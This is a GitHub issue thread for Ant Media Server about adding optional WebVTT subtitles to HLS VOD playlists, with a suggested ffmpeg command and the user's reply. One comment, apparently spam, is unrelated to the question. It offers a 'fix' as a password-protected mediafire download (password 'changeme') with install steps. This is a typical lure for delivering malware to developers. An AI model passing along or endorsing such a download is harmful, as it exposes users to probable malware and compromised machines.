### ISSUE TITLE
Subtitles inside Playlist HLS Stream

### ISSUE THREAD

**Issue by amarantmeida** [ant-media/Ant-Media-Server#6619]
### Short description
__Is it possible to include subtitle vtt information with a VOD Playlist hls? The VOD files themselves also have the subtitles embedded in the mp4 files. When I play the hls stream url in VLC, I do not see the option to enable the subtitles

Suggested the below command. 
**ffmpeg -i input.mp4 -vf subtitles=captions.vtt output.mp4**
User response- 
I was looking for an optional solution. Some people may want to enable the subtitles while others may not. Wasn't sure if this was possible since it seems the hls stream currently doesn't include the already embedded subtitles. They don't appear as an option when I look at the stream in VLC. Sounds like I might have to run the vtt data separately in parallel to the stream.__

### Environment

* Operating system and version:
* Java version: 
* Ant Media Server version:2.10
* Browser name and version:

### Steps to reproduce
NA

### Expected behavior
__Put as much detail here as possible__

### Actual behavior
__Put as much detail here as possible__

### Logs
__Place logs on [pastebin](http://pastebin.com/) or elsewhere and put links here__

Ask your questions on [Ant Media Github Discussions](https://github.com/orgs/ant-media/discussions)

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by muratugureminoglu** [comment]
<div>Agent Amarnath Thodupunoori linked Freshdesk ticket <a href="https://antmedia.freshdesk.com/a/tickets/131948">131948</a> for this issue.</div><br/>
